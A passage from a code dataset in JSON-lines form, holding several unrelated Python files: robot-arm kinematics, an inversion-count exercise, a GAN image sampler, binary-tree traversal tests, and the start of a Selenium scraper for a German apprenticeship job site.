theta_actuators[1, 0]\n theta3 = theta_actuators[2, 0]\n theta4 = theta_actuators[3, 0]\n theta5 = theta_actuators[4, 0]\n theta6 = theta_actuators[5, 0]\n\n a1 = np.matrix([[a[0, 0] * np.cos(theta1)],\n [a[0, 0] * np.sin(theta1)],\n [d[0, 0]]])\n a2 = np.matrix([[a[0, 1] * np.cos(theta2)],\n [a[0, 1] * np.sin(theta2)],\n [d[0, 1]]])\n a3 = np.matrix([[a[0, 2] * np.cos(theta3)],\n [a[0, 2] * np.sin(theta3)],\n [d[0, 2]]])\n a4 = np.matrix([[a[0, 3] * np.cos(theta4)],\n [a[0, 3] * np.sin(theta4)],\n [d[0, 3]]])\n a5 = np.matrix([[a[0, 4] * np.cos(theta5)],\n [a[0, 4] * np.sin(theta5)],\n [d[0, 4]]])\n a6 = np.matrix([[a[0, 5] * np.cos(theta6)],\n [a[0, 5] * np.sin(theta6)],\n [d[0, 5]]])\n\n Q1 = np.matrix([[np.cos(theta1), -np.cos(alpha[0, 0]) * np.sin(theta1), np.sin(alpha[0, 0]) * np.sin(theta1)],\n [np.sin(theta1), np.cos(alpha[0, 0]) * np.cos(theta1), -np.sin(alpha[0, 0]) * np.cos(theta1)],\n [0, np.sin(alpha[0, 0]), np.cos(alpha[0, 0])]])\n Q2 = np.matrix([[np.cos(theta2), -np.cos(alpha[0, 1]) * np.sin(theta2), np.sin(alpha[0, 1]) * np.sin(theta2)],\n [np.sin(theta2), np.cos(alpha[0, 1]) * np.cos(theta2), -np.sin(alpha[0, 1]) * np.cos(theta2)],\n [0, np.sin(alpha[0, 1]), np.cos(alpha[0, 1])]])\n Q3 = np.matrix([[np.cos(theta3), -np.cos(alpha[0, 2]) * np.sin(theta3), np.sin(alpha[0, 2]) * np.sin(theta3)],\n [np.sin(theta3), np.cos(alpha[0, 2]) * np.cos(theta3), -np.sin(alpha[0, 2]) * np.cos(theta3)],\n [0, np.sin(alpha[0, 2]), np.cos(alpha[0, 2])]])\n Q4 = np.matrix([[np.cos(theta4), -np.cos(alpha[0, 3]) * np.sin(theta4), np.sin(alpha[0, 3]) * np.sin(theta4)],\n [np.sin(theta4), np.cos(alpha[0, 3]) * np.cos(theta4), -np.sin(alpha[0, 3]) * np.cos(theta4)],\n [0, np.sin(alpha[0, 3]), np.cos(alpha[0, 3])]])\n Q5 = np.matrix([[np.cos(theta5), -np.cos(alpha[0, 4]) * np.sin(theta5), np.sin(alpha[0, 4]) * np.sin(theta5)],\n [np.sin(theta5), np.cos(alpha[0, 4]) * np.cos(theta5), -np.sin(alpha[0, 4]) * np.cos(theta5)],\n [0, np.sin(alpha[0, 4]), np.cos(alpha[0, 4])]])\n Q6 = np.matrix([[np.cos(theta6), -np.cos(alpha[0, 5]) * np.sin(theta6), np.sin(alpha[0, 5]) * np.sin(theta6)],\n [np.sin(theta6), np.cos(alpha[0, 5]) * np.cos(theta6), -np.sin(alpha[0, 5]) * np.cos(theta6)],\n [0, np.sin(alpha[0, 5]), np.cos(alpha[0, 5])]])\n Q = Q1 * Q2 * Q3 * Q4 * Q5 * Q6\n\n cartesian_pose = a1 + Q1 * a2 + Q1 * Q2 * a3 + Q1 * Q2 * Q3 * a4 + Q1 * Q2 * Q3 * Q4 * a5 + Q1 * Q2 * Q3 * Q4 * Q5 * a6\n\n return cartesian_pose, Q\n\n\n# Calculates Rotation Matrix given euler angles.\ndef eulerAnglesToRotationMatrix(theta):\n R_x = np.array([[1, 0, 0],\n [0, math.cos(theta[0]), -math.sin(theta[0])],\n [0, math.sin(theta[0]), math.cos(theta[0])]\n ])\n\n R_y = np.array([[math.cos(theta[1]), 0, math.sin(theta[1])],\n [0, 1, 0],\n [-math.sin(theta[1]), 0, math.cos(theta[1])]\n ])\n\n R_z = np.array([[math.cos(theta[2]), -math.sin(theta[2]), 0],\n [math.sin(theta[2]), math.cos(theta[2]), 0],\n [0, 0, 1]\n ])\n\n R = np.dot(R_z, np.dot(R_y, R_x))\n\n return R\n\n# Checks if a matrix is a valid rotation matrix.\ndef isRotationMatrix(R):\n Rt = np.transpose(R)\n shouldBeIdentity = np.dot(Rt, R)\n I = np.identity(3, dtype=R.dtype)\n n = np.linalg.norm(I - shouldBeIdentity)\n return n < 1e-6\n\n\n# Calculates rotation matrix to euler angles\n# The result is the same as MATLAB except the order\n# of the euler angles ( x and z are swapped ).\ndef rotationMatrixToEulerAngles(R):\n assert (isRotationMatrix(R))\n\n sy = math.sqrt(R[0, 0] * R[0, 0] + R[1, 0] * R[1, 0])\n\n singular = sy < 1e-6\n\n if not singular:\n x = math.atan2(R[2, 1], R[2, 2])\n y = math.atan2(-R[2, 0], sy)\n z = math.atan2(R[1, 0], R[0, 0])\n else:\n x = math.atan2(-R[1, 2], R[1, 1])\n y = math.atan2(-R[2, 0], sy)\n z = 0\n\n return np.array([x, y, z])\n\n\nif __name__ == '__main__':\n theta = np.array([2, 2, 2, 2, 2, 2])\n old_pose, old_Q = jaco_direct_kinematics(theta)\n print(old_pose)\n theta, success = jaco_inverse_kinematics(theta, old_pose, old_Q)\n theta = (theta + np.pi) % (2 * np.pi) - np.pi\n\n print(theta, success)\n old_pose, old_Q = jaco_direct_kinematics(theta)\n theta, success = jaco_inverse_kinematics(theta, old_pose, old_Q)\n theta = (theta + np.pi) % (2 * np.pi) - np.pi\n print(theta, success)\n old_pose, old_Q = jaco_direct_kinematics(theta)\n theta, success = jaco_inverse_kinematics(theta, old_pose, old_Q)\n theta = (theta + np.pi) % (2 * np.pi) - np.pi\n print(theta, success)\n old_pose, old_Q = jaco_direct_kinematics(theta)\n theta, success = jaco_inverse_kinematics(theta, old_pose, old_Q)\n theta = (theta + np.pi) % (2 * np.pi) - np.pi\n print(theta, success)\n old_pose, old_Q = jaco_direct_kinematics(theta)\n theta, success = jaco_inverse_kinematics(theta, old_pose, old_Q)\n theta = (theta + np.pi) % (2 * np.pi) - np.pi\n print(theta, success)\n # print(\"direct kinematics\")\n # print(Q)\n # print(\"euleur angles\")\n # euler = rotationMatrixToEulerAngles(Q)\n # print(euler)\n # print(\"Q recomposee avec euler angles\")\n # new_Q = eulerAnglesToRotationMatrix(euler)\n # print(new_Q)\n # print(\"difference entre les deux\")\n # print(Q - new_Q)\n # for i in range(100):\n # pose, Q = jaco_direct_kinematics(theta)\n #\n # angular_velocities = convert_to_angular_velocities([-0.01, 0, 0, 0, 0, 0], theta, 0.01)\n # angular_velocities = angular_velocities.reshape(1, 6)[0]\n # # print(angular_velocities)\n # # print(theta)\n # theta += angular_velocities\n # # print(theta)\n # print(np.subtract(pose, old_pose) / 0.1)\n # old_pose = pose\n # for i in range(100):\n # pose, Q = jaco_direct_kinematics(theta)\n # angular_velocities = convert_to_angular_velocities([0.01, 0, 0, 0, 0, 0], theta, 0.01)\n # angular_velocities = angular_velocities.reshape(1, 6)[0]\n # #print(angular_velocities)\n # #print(theta)\n # theta += angular_velocities\n # #print(theta)\n # #print(angular_velocities)\n # print(np.subtract(pose, old_pose) / 10)\n # old_pose = pose\n\n\n\n\n\n\n\n\n","sub_path":"jaco_jacobian.py","file_name":"jaco_jacobian.py","file_ext":"py","file_size_in_byte":16964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"508819452","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the countInversions function below.\ndef countInversions(arr):\n\titr = 0\n\tn = len(arr)\n\tfor i in range(0,n):\n\t\tfor j in range(0,n-1):\n\t\t\tif (arr[j] > arr[j+1]):\n\t\t\t\tarr[j], arr[j+1] = arr[j+1], arr[j]\n\t\t\t\titr = itr + 1\n\n\treturn itr\n\n\n\nif __name__ == '__main__':\n\tfptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n\tt = int(input())\n\n\tfor t_itr in range(t):\n\t\tn = int(input())\n\n\t\tarr = list(map(int, input().rstrip().split()))\n\n\t\tresult = countInversions(arr)\n\n\t\tfptr.write(str(result) + '\\n')\n\n\tfptr.close()\n","sub_path":"Cracking the Coding Interview Challenges/ALGORITHMS/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"140526922","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# заготовка массива под циферки + просим первую\nmas_N = []\nstr_OK = input(\"Введи че-нибудь приличное: \")\n\n# обкашляем че он там написал и пихаем в массив\nwhile str_OK:\n mas_N.append(str_OK)\n str_OK = input(\"Введи че-нибудь приличное: \")\n\t\nprint(\"Вот че ты наделал:\\n\", mas_N)\n","sub_path":"HW_2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"493260214","text":"import argparse\r\nimport os\r\nimport random\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.parallel\r\nimport torch.backends.cudnn as cudnn\r\nimport torch.optim as optim\r\nimport torch.utils.data\r\nimport torchvision.datasets as dset\r\nimport torchvision.transforms as transforms\r\nimport torchvision.utils as vutils\r\nfrom stn import STNM\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--dataset', required=True, help='cifar10 | lsun | imagenet | folder | lfw ')\r\nparser.add_argument('--workers', type=int, help='number of data loading workers', default=2)\r\nparser.add_argument('--numImages', type=int, default=10000, help='input batch size')\r\nparser.add_argument('--imageSize', type=int, default=64, help='the height / width of the input image to network')\r\nparser.add_argument('--nz', type=int, default=100, help='size of the latent z vector')\r\nparser.add_argument('--ngf', type=int, default=64)\r\nparser.add_argument('--ndf', type=int, default=64)\r\nparser.add_argument('--ntimestep', type=int, default=2, help='number of recursive steps')\r\nparser.add_argument('--maxobjscale', type=float, default=1.2, help='maximal object size relative to image')\r\nparser.add_argument('--session', type=int, default=1, help='training session')\r\nparser.add_argument('--cuda', type=bool, default=True, help='enables cuda')\r\nparser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')\r\nparser.add_argument('--netG', default='', help=\"path to netG (to continue training)\")\r\nparser.add_argument('--outimgf', default='images', help='folder to output images checkpoints')\r\nparser.add_argument('--manualSeed', type=int, help='manual seed')\r\n\r\nopt = parser.parse_args()\r\nprint(opt)\r\n\r\nif opt.manualSeed is None:\r\n opt.manualSeed = random.randint(1, 10000)\r\nprint(\"Random Seed: \", opt.manualSeed)\r\nrandom.seed(opt.manualSeed)\r\ntorch.manual_seed(opt.manualSeed)\r\nif opt.cuda:\r\n torch.cuda.manual_seed_all(opt.manualSeed)\r\n\r\ncudnn.benchmark = True\r\n\r\nif torch.cuda.is_available() and not opt.cuda:\r\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\r\n\r\nif opt.dataset in ['imagenet', 'folder', 'lfw']:\r\n pass\r\nelif opt.dataset == 'lsun':\r\n checkfreq = 100\r\nelif opt.dataset == 'cifar10':\r\n checkfreq = 100\r\n nc = 3\r\n rot = 0.1\r\nelif opt.dataset == 'cub200':\r\n checkfreq = 40\r\n writefreq = 20\r\n nc = 3\r\n rot = 0.1\r\nelif opt.dataset == 'mnist-one':\r\n checkfreq = 100\r\n nc = 1\r\n rot = 0.3\r\nelif opt.dataset == 'mnist-two':\r\n checkfreq = 100\r\n nc = 1\r\n rot = 0.3\r\n\r\nngpu = int(opt.ngpu)\r\nnz = int(opt.nz)\r\nngf = int(opt.ngf)\r\nndf = int(opt.ndf)\r\nnsize = int(opt.imageSize)\r\nntimestep = int(opt.ntimestep)\r\n\r\n\r\n# custom weights initialization called on netG and netD\r\ndef weights_init(m):\r\n classname = m.__class__.__name__\r\n if classname.find('Conv') != -1:\r\n m.weight.data.normal_(0.0, 0.02)\r\n m.bias.data.fill_(0)\r\n elif classname.find('BatchNorm') != -1:\r\n m.weight.data.normal_(1.0, 0.02)\r\n m.bias.data.fill_(0)\r\n\r\n\r\nclass _netG(nn.Module):\r\n def __init__(self, ngpu, nsize):\r\n super(_netG, self).__init__()\r\n self.ngpu = ngpu\r\n self.nsize_out = 2\r\n # define recurrent net for processing input random noise\r\n self.lstmcell = nn.LSTMCell(nz, nz)\r\n\r\n \"\"\"background generator G_bg\"\"\"\r\n # convt1 + bn1 + relu1 (1 x 1 --> 4 x 4) (nz --> 4 * ngf)\r\n # convt4 + bn4 + relu4 (4 x 4 --> 8 x 8) (4 * ngf --> 2 * ngf)\r\n # convt8 + bn8 + relu8 (8 x 8 --> 16x16) (2 * ngf --> ngf)\r\n # convt16 + bn16 + relu16 (16x16 --> 32x32) (ngf --> ngf / 2)\r\n self.Gbgc, self.depth_in_bg = self.buildNetGbg(nsize)\r\n # bg image head: convt + tanh (32x32 --> 64x64) (ngf --> nc)\r\n self.Gbgi = nn.Sequential(\r\n nn.ConvTranspose2d(self.depth_in_bg, nc, 4, 2, 1, bias=True),\r\n nn.Tanh()\r\n )\r\n\r\n \"\"\"foreground generator G_fg\"\"\"\r\n # the shared net\r\n # convt1 + bn1 + relu1 (1 x 1 --> 4 x 4) (nz --> 8 * ngf)\r\n # convt4 + bn4 + relu4 (4 x 4 --> 8 x 8) (8 * ngf --> 4 * ngf)\r\n # convt8 + bn8 + relu8 (8 x 8 --> 16x16) (4 * ngf --> 2 * ngf)\r\n # convt16 + bn16 + relu16 (16x16 --> 32x32) (2 * ngf --> ngf)\r\n self.Gfgc, self.depth_in = self.buildNetGfg(nsize)\r\n # fg image head: convt + tanh (32x32 --> 64x64) (ngf --> nc)\r\n self.Gfgi = nn.Sequential(\r\n nn.ConvTranspose2d(self.depth_in, nc, 4, 2, 1, bias=False),\r\n nn.Tanh()\r\n )\r\n # fg mask head: convt + sigmoid (32x32 --> 64x64) (ngf --> 1)\r\n self.Gfgm = nn.Sequential(\r\n nn.ConvTranspose2d(self.depth_in, 1, 4, 2, 1, bias=True),\r\n nn.Sigmoid()\r\n )\r\n\r\n \"\"\"grid generator G_grid\"\"\"\r\n # 6-dim transform parameters output layer\r\n self.Gtransform = nn.Linear(nz, 6)\r\n self.Gtransform.weight.data.zero_()\r\n self.Gtransform.bias.data.zero_()\r\n self.Gtransform.bias.data[0] = opt.maxobjscale\r\n self.Gtransform.bias.data[4] = opt.maxobjscale\r\n\r\n # compsitor\r\n self.compositor = STNM()\r\n\r\n \"\"\"encoder when ntimestep > 2\"\"\"\r\n # Question: why is this encoder step needed, given that there is already the LSTM?\r\n # avgpool32 + bn32 + lrelu32 (32x32 --> 16x16)\r\n # avgpool16 + bn16 + lrelu16 (16x16 --> 8 x 8)\r\n # avgpool8 + bn8 + lrelu8 (8 x 8 --> 4 x 4)\r\n # avgpool4 + bn4 + lrelu4 (4 x 4 --> 2 x 2)\r\n self.encoderconv = self.buildEncoderConv(self.depth_in, nsize // 2, self.nsize_out)\r\n # fc (ngf * 2 * 2 --> nz)\r\n self.encoderfc = self.buildEncoderFC(self.depth_in, self.nsize_out, nz)\r\n self.nlnet = nn.Sequential(\r\n nn.Linear(nz + nz, nz),\r\n nn.BatchNorm1d(nz),\r\n nn.Tanh()\r\n )\r\n\r\n def buildNetGbg(self, nsize): # take vector as input, and outout bgimg\r\n net = nn.Sequential()\r\n size_map = 1\r\n name = str(size_map)\r\n\r\n # convt1 + bn1 + relu1 (nz --> 4 * ngf)\r\n net.add_module('convt' + name, nn.ConvTranspose2d(nz, ngf * 4, 4, 4, 0, bias=True))\r\n net.add_module('bn' + name, nn.BatchNorm2d(ngf * 4))\r\n net.add_module('relu' + name, nn.ReLU(True))\r\n\r\n # convt4 + bn4 + relu4 (4 * ngf --> 2 * ngf)\r\n # convt8 + bn8 + relu8 (2 * ngf --> ngf)\r\n # convt16 + bn16 + relu16 (ngf --> ngf / 2)\r\n size_map = 4\r\n depth_in = 4 * ngf\r\n depth_out = 2 * ngf\r\n while size_map < nsize / 2:\r\n name = str(size_map)\r\n net.add_module('convt' + name, nn.ConvTranspose2d(depth_in, depth_out, 4, 2, 1, bias=True))\r\n net.add_module('bn' + name, nn.BatchNorm2d(depth_out))\r\n net.add_module('relu' + name, nn.ReLU(True))\r\n depth_in = depth_out\r\n depth_out = max(depth_in // 2, 64)\r\n size_map = size_map * 2\r\n return net, depth_in\r\n\r\n def buildNetGfg(self, nsize): # take vector as input, and output fgimg and fgmask\r\n net = nn.Sequential()\r\n size_map = 1\r\n name = str(size_map)\r\n\r\n # convt1 + bn1 + relu1 (nz --> 8 * ngf)\r\n net.add_module('convt' + name, nn.ConvTranspose2d(nz, ngf * 8, 4, 4, 0, bias=False))\r\n net.add_module('bn' + name, nn.BatchNorm2d(ngf * 8))\r\n net.add_module('relu' + name, nn.ReLU(True))\r\n\r\n # convt4 + bn4 + relu4 (8 * ngf --> 4 * ngf)\r\n # convt8 + bn8 + relu8 (4 * ngf --> 2 * ngf)\r\n # convt16 + bn16 + relu16 (2 * ngf --> ngf)\r\n size_map = 4\r\n depth_in = 8 * ngf\r\n depth_out = 4 * ngf\r\n while size_map < nsize / 2:\r\n name = str(size_map)\r\n net.add_module('convt' + name, nn.ConvTranspose2d(depth_in, depth_out, 4, 2, 1, bias=False))\r\n net.add_module('bn' + name, nn.BatchNorm2d(depth_out))\r\n net.add_module('relu' + name, nn.ReLU(True))\r\n depth_in = depth_out\r\n depth_out = max(depth_in // 2, 64)\r\n size_map = size_map * 2\r\n\r\n return net, depth_in\r\n\r\n def buildEncoderConv(self, depth_in, nsize_in, nsize_out):\r\n net = nn.Sequential()\r\n nsize_i = nsize_in\r\n while nsize_i > nsize_out: # 32 --> 16 --> 8 --> 4\r\n name = str(nsize_i)\r\n net.add_module('avgpool' + name, nn.AvgPool2d(4, 2, 1))\r\n net.add_module('bn' + name, nn.BatchNorm2d(depth_in))\r\n net.add_module('lrelu' + name, nn.LeakyReLU(0.2, inplace=True))\r\n nsize_i = nsize_i // 2\r\n return net\r\n\r\n def buildEncoderFC(self, depth_in, nsize_in, out_dim):\r\n net = nn.Sequential(\r\n nn.Linear(depth_in * nsize_in * nsize_in, out_dim),\r\n nn.BatchNorm1d(out_dim),\r\n nn.Tanh()\r\n )\r\n return net\r\n\r\n def clampT(self, Tin):\r\n \"\"\"\r\n This function is to restrict transformation scale greater than the minimum scale.\r\n Tin: Tensor(N, 6)\r\n\r\n \"\"\"\r\n x_s = Tin[:, 0].clamp(opt.maxobjscale, 2 * opt.maxobjscale) # scale for x axis ???\r\n x_r = Tin[:, 1].clamp(-rot, rot) # rotation for x axis ???\r\n x_t = Tin[:, 2].clamp(-1.0, 1.0) # translation for x axis ??\r\n\r\n y_s = Tin[:, 3].clamp(opt.maxobjscale, 2 * opt.maxobjscale) # scale for y axis ???\r\n y_r = Tin[:, 4].clamp(-rot, rot) # rotation for y axis ???\r\n y_t = Tin[:, 5].clamp(-1.0, 1.0) # translation for y axis ??\r\n\r\n Tout = torch.stack([x_s, x_r, x_t, y_r, y_s, y_t], dim=1)\r\n return Tout\r\n\r\n def old_clampT(self, Tin):\r\n x_s = Tin.select(1, 0)\r\n x_r = Tin.select(1, 1)\r\n x_t = Tin.select(1, 2)\r\n\r\n y_r = Tin.select(1, 3)\r\n y_s = Tin.select(1, 4)\r\n y_t = Tin.select(1, 5)\r\n\r\n x_s_clamp = torch.unsqueeze(x_s.clamp(opt.maxobjscale, 2 * opt.maxobjscale), 1)\r\n x_r_clmap = torch.unsqueeze(x_r.clamp(-rot, rot), 1)\r\n x_t_clmap = torch.unsqueeze(x_t.clamp(-1.0, 1.0), 1)\r\n\r\n y_r_clamp = torch.unsqueeze(y_r.clamp(-rot, rot), 1)\r\n y_s_clamp = torch.unsqueeze(y_s.clamp(opt.maxobjscale, 2 * opt.maxobjscale), 1)\r\n y_t_clamp = torch.unsqueeze(y_t.clamp(-1.0, 1.0), 1)\r\n\r\n Tout = torch.cat([x_s_clamp, x_r_clmap, x_t_clmap, y_r_clamp, y_s_clamp, y_t_clamp], 1)\r\n return Tout\r\n\r\n def forward(self, input):\r\n batchSize = input.size(1)\r\n\r\n # initialize the hidden state & the cell\r\n hx = torch.zeros(batchSize, nz).to(input.device)\r\n cx = torch.zeros(batchSize, nz).to(input.device)\r\n\r\n outputsT = []\r\n fgimgsT = []\r\n fgmaskT = []\r\n\r\n \"\"\"initial step: generate bg canvas\"\"\"\r\n hx, cx = self.lstmcell(input[0], (hx, cx))\r\n hx_view = hx.contiguous().view(batchSize, nz, 1, 1)\r\n # We send input vector to background generator directly\r\n # to make it equivalent to DCGAN when ntimestep = 1.\r\n bgc = self.Gbgc(input[0][:, :, None, None])\r\n canvas = self.Gbgi(bgc)\r\n outputsT.append(canvas)\r\n\r\n \"\"\"other steps: generate fg component\"\"\"\r\n prevc = bgc\r\n for i in range(1, ntimestep):\r\n # LSTM process\r\n hx, cx = self.lstmcell(input[i], (hx, cx))\r\n\r\n # shortcut process if enabled\r\n if ntimestep > 2:\r\n encConv = self.encoderconv(prevc)\r\n encConv_view = encConv.view(batchSize, self.depth_in * self.nsize_out * self.nsize_out)\r\n encFC = self.encoderfc(encConv_view)\r\n concat = torch.cat([hx, encFC], 1)\r\n comb = self.nlnet(concat)\r\n input4g = comb\r\n # input4g_view = input4g.contiguous().view(batchSize, nz, 1, 1)\r\n else:\r\n input4g = hx\r\n # input4g_view = hx_view\r\n\r\n # generate foreground image and mask\r\n fgc = self.Gfgc(input4g[:, :, None, None]) # hx_view: Tensor(N, Z, 1, 1)\r\n fgi = self.Gfgi(fgc) # foreground image\r\n fgm = self.Gfgm(fgc) # foreground mask\r\n\r\n # composition\r\n fgt = self.clampT(self.Gtransform(input4g)) # Foreground transformation parameters Tensor(N, 6)\r\n # fgg = self.Ggrid(fgt_view) # generate grid to transform fg in a differentiable way\r\n fgg = nn.functional.affine_grid(fgt.view(batchSize, 2, 3),\r\n [batchSize, nc, opt.imageSize, opt.imageSize],\r\n align_corners=False) # Tensor(N, H, W, 2)\r\n canvas = self.compositor(canvas=canvas, image=fgi, mask=fgm, grid=fgg) # Tensor(N, nc, H, W)\r\n\r\n # collect results at current step\r\n prevc = fgc\r\n outputsT.append(canvas)\r\n fgimgsT.append(fgi)\r\n fgmaskT.append(fgm)\r\n\r\n return outputsT[-1], outputsT, fgimgsT, fgmaskT\r\n\r\n\r\nnetG = _netG(ngpu, nsize)\r\n# For smaller network, initialize BN as usual\r\n# For larger network, initialize BN with zero mean\r\n# The later case works for both, so we commet the initializzaton\r\n# netG.apply(weights_init)\r\nif opt.netG != '':\r\n netG.load_state_dict(torch.load(opt.netG))\r\nprint(netG)\r\n\r\n\r\nnoise = torch.FloatTensor(ntimestep, 1, nz)\r\n\r\nif opt.cuda:\r\n netG.cuda()\r\n noise = noise.cuda()\r\n\r\n# make dir\r\nos.makedirs(os.path.join(opt.outimgf, \"images\"), exist_ok=True)\r\nos.makedirs(os.path.join(opt.outimgf, \"masks\"), exist_ok=True)\r\nname_len = int(np.log10(opt.numImages) + 1)\r\nprogress = tqdm(range(opt.numImages))\r\n\r\nnetG.eval()\r\nwith torch.no_grad():\r\n for idx in progress:\r\n # train with fake\r\n noise.resize_(ntimestep, 1, nz).normal_(0, 1)\r\n fake, fakeseq, fgimgseq, fgmaskseq = netG(noise)\r\n\r\n # save images\r\n ndarr = fake[0].add_(1.).mul_(0.5*255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()\r\n im = Image.fromarray(ndarr)\r\n im.save(os.path.join(opt.outimgf, \"images\", f\"{idx}\".zfill(name_len) + \".png\"))\r\n\r\n # save masks\r\n ndarr = fgmaskseq[-1][0].mul_(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()\r\n mask = Image.fromarray(np.concatenate([ndarr, ndarr, ndarr], axis=2))\r\n mask.save(os.path.join(opt.outimgf, \"masks\", f\"{idx}\".zfill(name_len) + \".png\"))\r\n\r\n progress.set_description(\r\n (\r\n f\"saving files at {opt.outimgf}/images(masks)/\" + f\"{idx}\".zfill(name_len) + \".png\"\r\n )\r\n )\r\n\r\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":14831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"463116066","text":"from struct import *\nfrom functools import reduce\n\ndef a(s):\n if isinstance(s,bytes):\n s = bytes.decode(s)\n return reduce(lambda x,y:x+y,[i for i in s if i != '\\0'])\n else:\n return s\nif __name__ == '__main__':\n p = pack('10s10s3d',b'phoneid',b'time',0.1,0.2,0.3)\n print(p)\n m = unpack('10s10s3d',p)\n print(list(map(a,m)))","sub_path":"datapack.py","file_name":"datapack.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"325138027","text":"from unittest import TestCase\nfrom RubkTreeTraversal import BinaryTree, Node\nfrom io import StringIO\nimport contextlib\n\n\nclass TestBinaryTree(TestCase):\n def gen_simple_tree(self):\n n2 = Node(2)\n n3 = Node(3)\n n1 = Node(1, n2, n3)\n return BinaryTree(n1)\n\n def gen_left_tree(self):\n n5 = Node(5)\n n4 = Node(4)\n n3 = Node(3, left=n4)\n n2 = Node(2, left=n3)\n n1 = Node(1, left=n2, right=n5)\n return BinaryTree(n1)\n\n def gen_right_tree(self):\n n5 = Node(5)\n n4 = Node(4)\n n3 = Node(3, right=n4)\n n2 = Node(2, right=n3)\n n1 = Node(1, left=n5, right=n2)\n return BinaryTree(n1)\n\n def gen_full_tree(self):\n n7 = Node(7)\n n6 = Node(6)\n n3 = Node(3, left=n6, right=n7)\n n5 = Node(5)\n n4 = Node(4)\n n2 = Node(2, left=n4, right=n5)\n n1 = Node(1, left=n2, right=n3)\n return BinaryTree(n1)\n\n def get_method_stdout(self, method):\n temp_stdout = StringIO()\n with contextlib.redirect_stdout(temp_stdout):\n method()\n return temp_stdout.getvalue().strip()\n\n def test_in_order_traversal_rec(self):\n tree = self.gen_simple_tree()\n output = self.get_method_stdout(tree.in_order_traversal_rec)\n self.assertEqual(\"2 1 3\", output)\n\n def test_in_order_traversal_iter(self):\n tree = self.gen_simple_tree()\n output = self.get_method_stdout(tree.in_order_traversal_iter)\n self.assertEqual(\"2 1 3\", output)\n\n def test_in_order_traversal_left_rec(self):\n tree = self.gen_left_tree()\n output = self.get_method_stdout(tree.in_order_traversal_rec)\n self.assertEqual(\"4 3 2 1 5\", output)\n\n def test_in_order_traversal_left_iter(self):\n tree = self.gen_left_tree()\n output = self.get_method_stdout(tree.in_order_traversal_iter)\n self.assertEqual(\"4 3 2 1 5\", output)\n\n def test_in_order_traversal_right_rec(self):\n tree = self.gen_right_tree()\n output = self.get_method_stdout(tree.in_order_traversal_rec)\n self.assertEqual(\"5 1 2 3 4\", output)\n\n def test_in_order_traversal_right_iter(self):\n tree = self.gen_right_tree()\n output = self.get_method_stdout(tree.in_order_traversal_iter)\n self.assertEqual(\"5 1 2 3 4\", output)\n\n def test_in_order_traversal_full_rec(self):\n tree = self.gen_full_tree()\n output = self.get_method_stdout(tree.in_order_traversal_rec)\n self.assertEqual(\"4 2 5 1 6 3 7\", output)\n\n def test_in_order_traversal_full_iter(self):\n tree = self.gen_full_tree()\n output = self.get_method_stdout(tree.in_order_traversal_iter)\n self.assertEqual(\"4 2 5 1 6 3 7\", output)\n","sub_path":"test_RubkTreeTraversalpy.py","file_name":"test_RubkTreeTraversalpy.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"166490428","text":"import os\nimport sys\nimport logging\nimport time\n\nfrom datetime import datetime\nfrom urllib import parse\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom apps.site_parser.models import City, Company, Vacancy\n\n\"\"\"Settings for local testing on Linux/Mac with Chrome driver\"\"\"\n\nLINUX_PLATFORM = 'linux'\nMAC_PLATFORM = 'darwin'\n\nWEB_DRIVERS = {\n LINUX_PLATFORM: 'chromedriver_linux_x64',\n MAC_PLATFORM: 'chromedriver_darwin'\n}\n\nCURRENT_PATH = os.path.abspath(os.path.dirname(__file__))\ntry:\n DRIVER_PATH = os.path.join(CURRENT_PATH, 'drivers',\n WEB_DRIVERS[sys.platform])\nexcept:\n raise Exception\n\nlogger = logging.getLogger('parser')\n\n\nclass BaseParser():\n \"\"\"\n Base class for import data from ausbildung.de\n \"\"\"\n\n # Pages to scrap\n URLS = {\n 'filter_page': 'https://www.ausbildung.de/suche/',\n }\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Init base parser\n \"\"\"\n self.browser = self._setup_browser()\n\n @staticmethod\n def _setup_browser():\n \"\"\"\n Prepare webdriver\n :return: \n \"\"\"\n logger.info(\"setup browser\")\n chrome_bin = os.environ.get('GOOGLE_CHROME_SHIM', None)\n\n options = webdriver.ChromeOptions()\n options.add_argument('headless')\n options.binary_location = chrome_bin\n\n return webdriver.Chrome(chrome_options=options)\n\n\nclass Parser(BaseParser):\n \"\"\"\n Main parser\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Init parser\n \"\"\"\n logger.info(\"init parser\")\n super(Parser, self).__init__(*args, **kwargs)\n self.filter_form = None\n self.vacancy_links = []\n\n def run(self):\n \"\"\"\n Run parsing\n \"\"\"\n logger.info(\"run parser\")\n self.browser.get(self.URLS['filter_page'])\n self._prepare_filters()\n self._handle_results()\n self._parse_vacancy_page()\n logger.info(\"successfully parsed\")\n\n def _prepare_filters(self):\n \"\"\"\n Fill 